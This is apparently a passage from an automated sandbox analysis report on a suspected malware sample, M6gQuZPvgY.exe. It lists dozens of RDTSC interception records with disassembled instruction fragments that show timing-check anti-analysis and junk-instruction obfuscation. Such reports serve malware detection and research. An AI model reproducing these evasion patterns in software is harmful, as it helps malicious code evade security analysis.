                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43314C second address: 433150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 433F62 second address: 433F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 433F67 second address: 433F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 434EAD second address: 434EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 434EB3 second address: 434EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4340DD second address: 434179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007FE310CDC3A2h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FE310CDC398h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 xor di, 7291h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c sub dword ptr [ebp+122D21E9h], esi 0x00000042 pushad 0x00000043 stc 0x00000044 jo 00007FE310CDC399h 0x0000004a movzx edi, bx 0x0000004d popad 0x0000004e mov eax, dword ptr [ebp+122D0A01h] 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007FE310CDC398h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 0000001Bh 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e push FFFFFFFFh 0x00000070 push eax 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FE310CDC39Bh 0x00000079 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 435ECD second address: 435EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F47 second address: 436F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F4B second address: 436F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F51 second address: 436F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE310CDC396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F5C second address: 436F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE311181225h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F7D second address: 436F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 436F83 second address: 436F8D instructions: 0x00000000 rdtsc 0x00000002 je 00007FE31118121Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4370D4 second address: 4370DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4370DA second address: 4370DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3DEA4D second address: 3DEA68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FE310CDC396h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FE310CDC39Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43C79C second address: 43C7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43C7A2 second address: 43C7A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43D7FF second address: 43D805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43D805 second address: 43D82A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FE310CDC3A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43D82A second address: 43D834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE311181216h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43F65C second address: 43F662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43E971 second address: 43E976 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 43E976 second address: 43EA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124551CAh], esi 0x00000010 jmp 00007FE310CDC3A7h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+122D2B11h], eax 0x00000022 add dword ptr [ebp+12478BD5h], edi 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FE310CDC398h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov ebx, dword ptr [ebp+1244FDB6h] 0x0000004f mov dword ptr [ebp+122D2F0Ah], esi 0x00000055 mov eax, dword ptr [ebp+122D0261h] 0x0000005b push eax 0x0000005c and ebx, dword ptr [ebp+122D3A39h] 0x00000062 pop ebx 0x00000063 push FFFFFFFFh 0x00000065 and ebx, 7DC4AB26h 0x0000006b nop 0x0000006c jmp 00007FE310CDC39Ah 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FE310CDC3A1h 0x00000079 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EA5D1 second address: 3EA5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3EA5D5 second address: 3EA5E1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE310CDC396h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44CC87 second address: 44CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE311181216h 0x0000000a popad 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44CC92 second address: 44CC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44CC97 second address: 44CC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44C69D second address: 44C6A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44C6A1 second address: 44C6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE31118121Dh 0x0000000d jnp 00007FE311181216h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 44C6BC second address: 44C6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4530F2 second address: 4530F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4530F8 second address: 45311F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE310CDC3A7h 0x00000009 popad 0x0000000a pop esi 0x0000000b jo 00007FE310CDC3AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 45311F second address: 453123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 453C51 second address: 453C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4598EB second address: 4598EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4598EF second address: 45990D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE310CDC3A8h 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 45990D second address: 459941 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE31118121Ch 0x00000008 jmp 00007FE311181229h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jc 00007FE31118121Eh 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 459DB9 second address: 459DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007FE310CDC396h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 45EDC6 second address: 45EDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 461A3F second address: 461A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A7h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FE310CDC3A5h 0x0000000f popad 0x00000010 jmp 00007FE310CDC3A5h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE310CDC39Ah 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46774E second address: 467757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46659D second address: 4665A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466871 second address: 46689D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE311181222h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FE311181222h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466B40 second address: 466B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466B44 second address: 466B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466B49 second address: 466B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466DFF second address: 466E0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE311181216h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466F76 second address: 466F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4670A4 second address: 4670A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4670A8 second address: 4670C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE310CDC39Ah 0x0000000f jnc 00007FE310CDC396h 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4671FF second address: 467207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 467207 second address: 467223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FE310CDC396h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jnc 00007FE310CDC396h 0x0000001b pop eax 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 40C7AC second address: 40C7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE311181223h 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 466036 second address: 46603B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46603B second address: 46605B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007FE311181216h 0x0000000b jmp 00007FE31118121Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE311181216h 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46605B second address: 46605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46D569 second address: 46D56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46D56D second address: 46D57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE310CDC396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C96C second address: 46C984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FE31118121Ch 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C984 second address: 46C993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C993 second address: 46C9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jp 00007FE311181216h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 46C9A7 second address: 46C9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FE310CDC396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473DA0 second address: 473DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE311181228h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473DBD second address: 473DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473DD3 second address: 473E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 jmp 00007FE311181226h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007FE311181233h 0x00000016 jmp 00007FE31118121Fh 0x0000001b push eax 0x0000001c jbe 00007FE311181216h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423EC0 second address: 423EC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423FA7 second address: 423FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423FAB second address: 423FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 423FCF second address: 423FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4240B4 second address: 4240B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4240B8 second address: 4240F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jc 00007FE31118121Ch 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FE31118121Fh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4240F3 second address: 424130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FE310CDC3A1h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jmp 00007FE310CDC3A0h 0x0000001c pop eax 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42442B second address: 42442F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42442F second address: 424433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 42459B second address: 4245AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jg 00007FE311181216h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4245AF second address: 4245B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424AE8 second address: 424AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE31118121Dh 0x00000009 popad 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424AFA second address: 424B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424B00 second address: 424B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424E01 second address: 424E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FE310CDC396h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424E16 second address: 424E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 424E1C second address: 40C7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE310CDC39Dh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FE310CDC398h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call dword ptr [ebp+122D301Fh] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jbe 00007FE310CDC396h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47315D second address: 473195 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FE311181225h 0x00000008 pop edx 0x00000009 jo 00007FE311181233h 0x0000000f jmp 00007FE311181227h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4732C5 second address: 4732CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4732CB second address: 4732CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
